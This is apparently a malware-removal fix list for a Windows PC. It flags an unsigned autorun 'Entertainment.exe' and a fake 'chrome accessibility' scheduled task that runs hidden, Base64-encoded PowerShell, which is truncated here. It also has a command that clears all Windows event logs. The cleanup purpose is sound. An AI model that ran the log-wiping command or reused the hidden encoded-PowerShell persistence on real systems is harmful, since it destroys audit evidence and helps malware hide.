(explorer.exe ->) (Entertainment application) [File not signed] C:\Users\olyti\AppData\Roaming\Entertainment\Entertainment.exe
HKU\S-1-5-21-3139933802-399766682-36797096-1001\...\Run: [Entertainment] => C:\Users\olyti\AppData\Roaming\Entertainment\Entertainment.exe [134353921 2022-06-13] (Entertainment application) [File not signed] <==== ATTENTION
C:\Users\olyti\AppData\Roaming\Entertainment
Task: {4766F956-3269-4F79-B2A1-0848C9AF8390} - System32\Tasks\chrome accessibility => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAbwBrAD0AJAB0AHIAdQBlAAoACgAkAGoAdgBBAHIAPQAkAG4AdQBsAGwAOwAKACQAZABfAHYAYQByACAAPQAgACIAMgAzACIAOwAKAAoACgAkAHMAdAByAF8ARQBOAEMAXwBBAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABtAHAAYQByACAAPQAgACIAVwB5AE (the data entry has 5407 more characters). <==== ATTENTION
2022-10-20 16:03 - 2022-10-20 16:03 - 000014906 _____ C:\WINDOWS\system32\Tasks\chrome accessibility
2022-10-20 08:37 - 2022-10-20 08:37 - 000000000 ____D C:\Users\olyti\AppData\Local\chrome_accessibility
2022-10-18 07:23 - 2022-10-18 07:23 - 000000000 ____D C:\Users\olyti\AppData\Local\Entertainment
2022-10-18 07:23 - 2022-06-13 02:52 - 000000000 ____D C:\Users\olyti\AppData\Roaming\Entertainment
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot: